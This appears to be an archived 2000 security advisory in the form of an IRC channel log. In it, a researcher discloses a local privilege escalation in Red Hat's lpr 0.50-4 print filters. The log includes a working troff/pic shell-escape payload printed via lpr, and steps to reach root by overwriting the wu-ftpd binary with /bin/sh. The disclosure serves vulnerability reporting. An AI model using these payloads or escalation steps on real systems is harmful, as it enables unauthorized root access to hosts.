redhat.lpr.txt

`details of an exploit agains lpr-0.50-4 (at least)  
(also affects other systems that may have the same print filters)  
  
URL : http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt  
AFFECTS : lpr-0.50-4 & earlier  
SEVERITY : local ROOT possible.   
SYNOPSIS : escalation of group permissions, leading to   
exploit for every user except root is available.  
root is sometimes available as well.  
(wu-ftpd-2.6.0-14.6x binaries are owned by user  
bin, and can be overwritten allowing root access  
if wu-ftpd is installed.)  
  
  
http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt  
  
This is a log of an advisory given in channel   
#roothat on irc.pulltheplug.com, October 16 2000.  
  
!!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!!  
  
--> zen-parse ([email protected]) has joined #roothat  
--- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer   
printer and j00 get a new group of friends. and stuff.  
--- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000  
--- noid gives channel operator status to zen-parse  
<bdev> hey zen  
<Safety> zen-parse  
<Safety> lockdown  
<zen-parse> lo all  
<bdev> what's this topic all about then zen?  
<zen-parse> new hole in lpr package for redhat  
<bdev> and...  
<bdev> ;]  
<bdev> you releasing it ?  
--> possem ([email protected]) has joined #roothat  
<zen-parse> [zen@continuity /tmp]$ id  
<zen-parse> uid=500(zen) gid=500(zen) groups=500(zen)  
<zen-parse> [zen@continuity /tmp]$ cat asdf  
<zen-parse> .PS  
<zen-parse> sh D/usr/bin/id>/tmp/yougetanyideasyetD  
<zen-parse> .PF  
<zen-parse> [zen@continuity /tmp]$ lpr asdf  
<zen-parse> [zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetany  
ideasyet  
<zen-parse> uid=500(zen) gid=500(zen) groups=7(lp)  
<zen-parse> [zen@continuity /tmp]$  
<zen-parse> consider it released  
<zen-parse> erm... missing a line...  
<bdev> heh  
<zen-parse> and should be ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideas  
yet  
<zen-parse> -rw-rw-rw- 1 zen zen 39 Oct 16 22:08 /tmp/yougeta  
nyideasyet  
<zen-parse> as the output  
<bdev> only gid lp ?  
<Remmy> ehm  
<Remmy> heh  
<bdev> but: -r-sr-sr-x 1 root lp 16292 Jan 10 2000 /usr/bin/lpr  
*  
<-- schematic|ZzZz has quit (Ping timeout)  
<zen-parse> thats not where the magic happens though.  
<zen-parse> ;]  
<zen-parse> needs a running lpd  
<zen-parse> and a printer that does troff  
<zen-parse> eg: PostScript  
<zen-parse> cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi  
<Remmy> zen...write a bugtraq advisory  
<Remmy> but get really really stoned first.  
<Remmy> hehe  
<zen-parse> `grog -Tps -msafer $TMP_FILE`  
<zen-parse> log this... use this as an advisory. ;]  
<zen-parse> that is where the magic happens.  
<zen-parse> grog is a perl script that selects the correct command line options  
for groff. groff can, if asked run a variety of other programs, such as eqn(fo  
r equations) tbl(for tables) and pic(for compiling pictures).  
<zen-parse> the -msafer means to disallow the call to any dangerous functions,   
such as executing a command or creating or modifying a file.   
<zen-parse> However pic is called without that option being passed, even though  
it does have a -S switch, which runs it in safer mode.  
<possem> zen-parse  
<zen-parse> The lpd checks what type of file the file is  
<zen-parse> with a program called file  
<bdev> hmm  
<Remmy> looks perty yummy  
<zen-parse> the type of this file is troff or preprocessor...   
<-- possem has quit (Quit: )  
<zen-parse> so the daemon then it hands it to the apropriate filters to print,   
one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi  
<zen-parse> which contains the grog command, which causes groff to run pic on t  
he file, and pic executes the file we speciify as the user the file was printed  
by.  
<zen-parse> with one exception.  
<zen-parse> you have been set to have a list of groups which just contains one   
group. lp  
<Remmy> hmm  
<zen-parse> (btw: group lp can edit all the configuration files for lpd. lpd ca  
n run the commands as any user (except root).  
<zen-parse> however, if u have wuftpd installed, there is a root exploit.  
<zen-parse> -rwxr-xr-x 1 bin bin 162608 Oct 14 19:36 /usr/sbin/in  
.ftpd  
<zen-parse> lrwxrwxrwx 1 bin bin 7 Sep 23 02:30 /usr/sbin/wu  
.ftpd -> in.ftpd  
<zen-parse> gain user bin, and copy /bin/sh over in.ftpd  
<Remmy> heh  
<zen-parse> telnet to port 21, and you have root. so it is a root exploit on sy  
stems with wufptd. and just every other uid on systems with lpd runnning.  
<zen-parse> )  
<bdev> heh, nice  
<zen-parse> there also appears to be an error file attempting to be made just a  
fter priviledges are dropped, but it has insuficient writes at that moment to a  
ctually succeed. the directory is owned by root, and only has lp write access b  
ecause the lpd runs as root.  
<zen-parse> um. you dats my advisory ;]  
--- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown  
@noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D   
<zen-parse> -- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|a  
fk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D   
<Remmy> ew  
<zen-parse> -- zen-parse ;]  
<Remmy> hehe  
<Remmy> i lik eyer bigtraq posts better...  
<Remmy> ya get all the leeto ascii in there and all...  
<zen-parse> ok... now ima save the buffer and submit it to bugtraq ;]  
<bdev> kewl  
--> ThaReaper ([email protected]) has joined #roothat  
<bdev> that'd be a cool advisory  
  
!!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!!  
  
Ob-ASCII  
  
/\/\ mee-errraaAAgghhhraher!  
= oo = /  
\()/ /  
/ __ \  
|| ||  
  
in memory of  
lucky.  
  
  
Send someone a cool Dynamitemail flashcard greeting!! And get rewarded.  
GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41  
`